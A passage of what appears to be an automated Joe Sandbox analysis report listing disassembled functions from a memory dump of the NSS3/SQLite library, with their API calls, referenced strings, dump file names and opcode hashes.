Part of subcall function 6CAC95C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6CAA7F4A,00000000,?,00000000,00000000), ref: 6CAC95F5
Part of subcall function 6CAC95C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6CAC9609
Part of subcall function 6CAC95C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CAC961D
Part of subcall function 6CAC95C0: PK11_GetInternalSlot.NSS3 ref: 6CAC970B
Part of subcall function 6CAC95C0: PK11_FreeSymKey.NSS3(00000000), ref: 6CAC9756
Part of subcall function 6CAC95C0: PK11_GetIVLength.NSS3(?), ref: 6CAC9767
Part of subcall function 6CAC95C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6CAC977E
Part of subcall function 6CAC95C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CAC978E

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CAF0C29

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: Util$K11_Tag_$Item_$FindZfree$Algorithm$Length$Alloc_BlockContextCreateFreeInternalSizeSlotfree
String ID:
API String ID: 2322824727-0
Opcode ID: e08a7931893c62fab119b9c742b65d9d55fd5cb3394d8ff7826518332fb759c6
Instruction ID: d7d2d2fffe5a98f34b054c95f3a21109eae8820d8b76f70d032f6ca80ca42ebc
Opcode Fuzzy Hash: e08a7931893c62fab119b9c742b65d9d55fd5cb3394d8ff7826518332fb759c6
Instruction Fuzzy Hash: A731F9B1A003445BE7109B74EE41BAB76B89F0435CF050528F81A97752FB71E98AC7E2

Function 6CA1E890 Relevance: 12.4, APIs: 5, Strings: 3, Instructions: 442stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6CA1E922
memset.VCRUNTIME140(00000000,00000000,?), ref: 6CA1E9CF
memcpy.VCRUNTIME140(00000024,?,?), ref: 6CA1EA0F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA1EB20
memcpy.VCRUNTIME140(?,?,?), ref: 6CA1EB57

Strings

foreign key on %s should reference only one column of table %T, xrefs: 6CA1EE04
unknown column "%s" in foreign key definition, xrefs: 6CA1ED18
number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 6CA1EDC2

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: memcpystrlen$memset
String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
API String ID: 638109778-272990098
Opcode ID: 2bd05f82d675e200ee39fa64dc6c1a6f9855e63b743596f60e85610da18a7cdc
Instruction ID: 1060507dd63a78fffff3fab2d1b647eded4555efacbe2fe5c9435e08868c4d53
Opcode Fuzzy Hash: 2bd05f82d675e200ee39fa64dc6c1a6f9855e63b743596f60e85610da18a7cdc
Instruction Fuzzy Hash: 3E029071E09119CFDB04CF99C484AAEB7F2BF89318F198169D815ABF51D731A981CBE0

Function 6CAE4DF0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 184memoryCOMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,00000022,?,?,6CAE536F,00000022,?,?,00000000,?), ref: 6CAE4E70
PORT_ZAlloc_Util.NSS3(00000000), ref: 6CAE4F28
PR_smprintf.NSS3(%s=%s,?,00000000), ref: 6CAE4F8E
PR_smprintf.NSS3(%s=%c%s%c,?,?,00000000,?), ref: 6CAE4FAE
free.MOZGLUE(?), ref: 6CAE4FC8

Strings

%s=%c%s%c, xrefs: 6CAE4FA9
%s=%s, xrefs: 6CAE4F89

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: R_smprintf$Alloc_Utilfreeisspace
String ID: %s=%c%s%c$%s=%s
API String ID: 2709355791-2032576422
Opcode ID: 039bd9dab85f8352f8044649370a98fea85c0974d12ba5e30fdbe9b14729bd0d
Instruction ID: 1c49af55a70ff4ec9b0085f221b5e61b7b9c79537bc67dd33ff463ef22c86eff
Opcode Fuzzy Hash: 039bd9dab85f8352f8044649370a98fea85c0974d12ba5e30fdbe9b14729bd0d
Instruction Fuzzy Hash: 00513931E452868BEB01CAEA84907FF7BFD9F4E708F1C8165E894A7A40D3359885A7D1

Function 6CA769A0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 162COMMON

Download Yara Rule

APIs

Part of subcall function 6CA0CA30: EnterCriticalSection.KERNEL32(?,?,?,6CA6F9C9,?,6CA6F4DA,6CA6F9C9,?,?,6CA3369A), ref: 6CA0CA7A
Part of subcall function 6CA0CA30: LeaveCriticalSection.KERNEL32(?), ref: 6CA0CB26

memset.VCRUNTIME140(00000000,00000000,?), ref: 6CA76A02
EnterCriticalSection.KERNEL32(?), ref: 6CA76AA6
LeaveCriticalSection.KERNEL32(?), ref: 6CA76AF9
sqlite3_free.NSS3(00000000), ref: 6CA76B15
sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,?,0000BCCC), ref: 6CA76BA6

Strings

delayed %dms for lock/sharing conflict at line %d, xrefs: 6CA76B9F
winDelete, xrefs: 6CA76B71

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$memsetsqlite3_freesqlite3_log
String ID: delayed %dms for lock/sharing conflict at line %d$winDelete
API String ID: 1816828315-1405699761
Opcode ID: 514f40fb09adc463063f08863bbe8f11af496cc20ba8161fbec3b840d48437f4
Instruction ID: 0e54c07d671f4da9bb8ef2408747f51843cb66dba87f13a8fe61416cf5f46290
Opcode Fuzzy Hash: 514f40fb09adc463063f08863bbe8f11af496cc20ba8161fbec3b840d48437f4
Instruction Fuzzy Hash: 55516439B401059BEF18AF64DC69ABE3739FF8B324B084128E416C7780DB309940CBE2

Function 6CB52F70 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB52FFD
sqlite3_initialize.NSS3 ref: 6CB53007
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CB53032
sqlite3_mprintf.NSS3(6CBBAAF9,?), ref: 6CB53073
sqlite3_free.NSS3(?), ref: 6CB530B3
sqlite3_mprintf.NSS3(sqlite3_get_table() called with two or more incompatible queries), ref: 6CB530C0

Strings

sqlite3_get_table() called with two or more incompatible queries, xrefs: 6CB530BB

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: sqlite3_mprintf$memcpysqlite3_freesqlite3_initializestrlen
String ID: sqlite3_get_table() called with two or more incompatible queries
API String ID: 750880481-4279182443
Opcode ID: acbfc728f1dc4ab964415c41dae17ad1d7d96575e7ffe243ab24c09c843149bc
Instruction ID: 04ff210d9d540532dfa5ea5ae21ff09fc5ff65d13f41321805233d23fc311546
Opcode Fuzzy Hash: acbfc728f1dc4ab964415c41dae17ad1d7d96575e7ffe243ab24c09c843149bc
Instruction Fuzzy Hash: 77419475600746ABDB00CF25D840B5AB7B9FF44368F588628EC5987B40E731F9A5CBD2

Function 6CA98CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,?,6CAA124D,00000001), ref: 6CA98D19
EnterCriticalSection.KERNEL32(?,?,?,?,6CAA124D,00000001), ref: 6CA98D32
PL_ArenaRelease.NSS3(?,?,?,?,?,6CAA124D,00000001), ref: 6CA98D73
PR_Unlock.NSS3(?,?,?,?,?,6CAA124D,00000001), ref: 6CA98D8C

Part of subcall function 6CB2DD70: TlsGetValue.KERNEL32 ref: 6CB2DD8C
Part of subcall function 6CB2DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CB2DDB4

PR_Unlock.NSS3(?,?,?,?,?,6CAA124D,00000001), ref: 6CA98DBA

Strings

KRAM, xrefs: 6CA98CF9
KRAM, xrefs: 6CA98D3E

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
String ID: KRAM$KRAM
API String ID: 2419422920-169145855
Opcode ID: 61c7b75e881af1aff91dffa28d878d2c36bfdf6273be22c47fe1f55b3363fbe5
Instruction ID: 486609d8c7794d2f2d15cc4c39b6b8943828d9e4175de8c66d6d9b82c524d1ad
Opcode Fuzzy Hash: 61c7b75e881af1aff91dffa28d878d2c36bfdf6273be22c47fe1f55b3363fbe5
Instruction Fuzzy Hash: EE21B2B5A14601CFDB00EF38C58566EB7F0FF45318F19896AD89887711EB34E885CB91

Function 6CABACC0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageDecryptFinal), ref: 6CABACE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CABAD14
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CABAD23

Part of subcall function 6CB9D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB9D963

PR_LogPrint.NSS3(?,00000000), ref: 6CABAD39

Strings

C_MessageDecryptFinal, xrefs: 6CABACE1
(CK_INVALID_HANDLE), xrefs: 6CABAD1C
hSession = 0x%x, xrefs: 6CABACFE, 6CABAD0E

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageDecryptFinal
API String ID: 332880674-3521875567
Opcode ID: 50142b92030b4e7e0f9959a39d447e665399d8e22ca143b3d608566756c543bd
Instruction ID: 1936941dcef2d2a8f354898d9f423ebeb14e127e4dbe9df756e39e8d59166cef
Opcode Fuzzy Hash: 50142b92030b4e7e0f9959a39d447e665399d8e22ca143b3d608566756c543bd
Instruction Fuzzy Hash: FD214C346001989FDB40DB64ED88B6E337AEB4AB5AF044035E809A7711DF309D8CCB93

Function 6CB90ED0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6CB90EE6
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6CB90EFA

Part of subcall function 6CA7AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6CA7AF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB90F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB90F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB90F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB90F2B

Strings

Assertion failure: %s, at %s:%d, xrefs: 6CB90ED9, 6CB90EE5, 6CB90F06, 6CB90F0B
Aborting, xrefs: 6CB90EB3

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: __acrt_iob_func$BreakDebugPrint__stdio_common_vfprintfabortfflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 2948422844-1374795319
Opcode ID: 5716102cef0c861407e56db1bb7e0574b4af58bdda9687cf8c2258e06782985f
Instruction ID: 30e542b8421a324d25f5f4307372d2b747f5fa6e0107a291645268f266fb4ee7
Opcode Fuzzy Hash: 5716102cef0c861407e56db1bb7e0574b4af58bdda9687cf8c2258e06782985f
Instruction Fuzzy Hash: 130180B6A00154BBDF01AFA8EC559AF3F3DEF4B264B104064FD0A97711D671EA5086A2

Function 6CB92B70 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41stringCOMMON

Download Yara Rule

APIs

strstr.VCRUNTIME140(?,.dll), ref: 6CB92B81
PR_smprintf.NSS3(%s%s,?,.dll), ref: 6CB92B98
PR_smprintf.NSS3(%s\%s%s,?,?,.dll), ref: 6CB92BB4
PR_smprintf.NSS3(6CBBAAF9,?), ref: 6CB92BC4

Strings

%s\%s, xrefs: 6CB92B93
.dll, xrefs: 6CB92B7B, 6CB92BA8, 6CB92BCE
%s\%s%s, xrefs: 6CB92BAF

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: R_smprintf$strstr
String ID: %s\%s$%s\%s%s$.dll
API String ID: 3360132973-3501675219
Opcode ID: 63c791c27f8857b9799496eb3516ec8d8eb08f5b0272dd33f87e47dd5b0f09a5
Instruction ID: 9d40d34ba8cd61469902c55e0cda1b0db4c9d4c5584c0f25d51c7bc273fa1de4
Opcode Fuzzy Hash: 63c791c27f8857b9799496eb3516ec8d8eb08f5b0272dd33f87e47dd5b0f09a5
Instruction Fuzzy Hash: 6EF0822ED420D5319910649B6D08DAB3E9DCDE37B8B450876BC1CB2E01BF31914984F3

Function 6CB54D80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 36COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CB54DC3
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CB54DE0

Strings

API call with %s database connection pointer, xrefs: 6CB54DBD
misuse, xrefs: 6CB54DD5
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CB54DCB
%s at line %d of [%.10s], xrefs: 6CB54DDA
invalid, xrefs: 6CB54DB8

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: 20a2bbc0a4750a82de3bf989ccd06b2710d1981761b36ac4f7b5418b46cec6fe
Instruction ID: 44e44e7f4b637b625f95345badeef5a5ddb88064cd194f76fa5d8bfb05e0c13c
Opcode Fuzzy Hash: 20a2bbc0a4750a82de3bf989ccd06b2710d1981761b36ac4f7b5418b46cec6fe
Instruction Fuzzy Hash: 56F0E029E145F42BD7014D16DD20FA637558F01339F9505E0FD0877EE2D6159C7447C2

Function 6CB54DF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CB54E30
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CB54E4D

Strings

API call with %s database connection pointer, xrefs: 6CB54E2A
misuse, xrefs: 6CB54E42
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CB54E38
%s at line %d of [%.10s], xrefs: 6CB54E47
invalid, xrefs: 6CB54E25

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: 499848d1442765108cc753ac7111c16823b8cb6091822f2c5980f8bd0823b030
Instruction ID: f9e3b475c03214893170884381bc8e9034759565e2f1a0be61a411c2cd233142
Opcode Fuzzy Hash: 499848d1442765108cc753ac7111c16823b8cb6091822f2c5980f8bd0823b030
Instruction Fuzzy Hash: 8EF09719F448E82BEA0808219D24F963389CB03339F8864A0EA0877E92CB1998B006D3

Function 6CAC0C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(00000000,00000000,6CAC1444,?,00000001,?,00000000,00000000,?,?,6CAC1444,?,?,00000000,?,?), ref: 6CAC0CB3

Part of subcall function 6CB2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB2C2BF

PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6CAC1444,?,00000001,?,00000000,00000000,?,?,6CAC1444,?), ref: 6CAC0DC1
PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6CAC1444,?,00000001,?,00000000,00000000,?,?,6CAC1444,?), ref: 6CAC0DEC

Part of subcall function 6CAE0F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6CA82AF5,?,?,?,?,?,6CA80A1B,00000000), ref: 6CAE0F1A
Part of subcall function 6CAE0F10: malloc.MOZGLUE(00000001), ref: 6CAE0F30
Part of subcall function 6CAE0F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CAE0F42

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6CAC1444,?,00000001,?,00000000,00000000,?), ref: 6CAC0DFF
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6CAC1444,?,00000001,?,00000000), ref: 6CAC0E16
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6CAC1444,?,00000001,?,00000000,00000000,?), ref: 6CAC0E53
PR_GetCurrentThread.NSS3(?,?,?,?,6CAC1444,?,00000001,?,00000000,00000000,?,?,6CAC1444,?,?,00000000), ref: 6CAC0E65
PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6CAC1444,?,00000001,?,00000000,00000000,?), ref: 6CAC0E79

Part of subcall function 6CAD1560: TlsGetValue.KERNEL32(00000000,?,6CAA0844,?), ref: 6CAD157A
Part of subcall function 6CAD1560: EnterCriticalSection.KERNEL32(?,?,?,6CAA0844,?), ref: 6CAD158F
Part of subcall function 6CAD1560: PR_Unlock.NSS3(?,?,?,?,6CAA0844,?), ref: 6CAD15B2

Part of subcall function 6CA9B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6CAA1397,00000000,?,6CA9CF93,5B5F5EC0,00000000,?,6CAA1397,?), ref: 6CA9B1CB
Part of subcall function 6CA9B1A0: free.MOZGLUE(5B5F5EC0,?,6CA9CF93,5B5F5EC0,00000000,?,6CAA1397,?), ref: 6CA9B1D2

Part of subcall function 6CA989E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6CA988AE,-00000008), ref: 6CA98A04
Part of subcall function 6CA989E0: EnterCriticalSection.KERNEL32(?), ref: 6CA98A15
Part of subcall function 6CA989E0: memset.VCRUNTIME140(6CA988AE,00000000,00000132), ref: 6CA98A27
Part of subcall function 6CA989E0: PR_Unlock.NSS3(?), ref: 6CA98A35

Memory Dump Source

Source File: 00000001.00000002.2772818162.000000006CA01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA00000, based on PE: true

Associated: 00000001.00000002.2772756524.000000006CA00000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773556877.000000006CB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773680424.000000006CBDE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773708353.000000006CBDF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773766585.000000006CBE0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2773790796.000000006CBE5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6ca00000_file.jbxd

Similarity

API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
String ID:
API String ID: 1601681851-0
Opcode ID: bf654f53ca3567be8124b05fbdec37db7cbf88cb5ea4214dd8d30b7d2d8565f1
Instruction ID: 2c38478056d9fa6fef2f9b305c33c5b5867f49d9bb226bb731bae47e5df22ab1
Opcode Fuzzy Hash: bf654f53ca3567be8124b05fbdec37db7cbf88cb5ea4214dd8d30b7d2d8565f1
Instruction Fuzzy Hash: 5A51B6F5E002016FEB019F64DD81ABF37B8AF05218F190064ED0997712FB21ED9987A3

Function 6CA76E50 Relevance: 12.2, APIs: 8, Instructions: 189COMMON

Download Yara Rule

APIs

sqlite3_value_text.NSS3(?,?), ref: 6CA76ED8
sqlite3_value_text.NSS3(?,?), ref: 6CA76EE5
memcmp.VCRUNTIME140(00000000,?,?,?,?), ref: 6CA76FA8
sqlite3_value_text.NSS3(00000000,?), ref: 6CA76FDB
sqlite3_result_error_nomem.NSS3(?,?,?,?,?), ref: 6CA76FF0
sqlite3_value_blob.NSS3(?,?), ref: 6CA77010
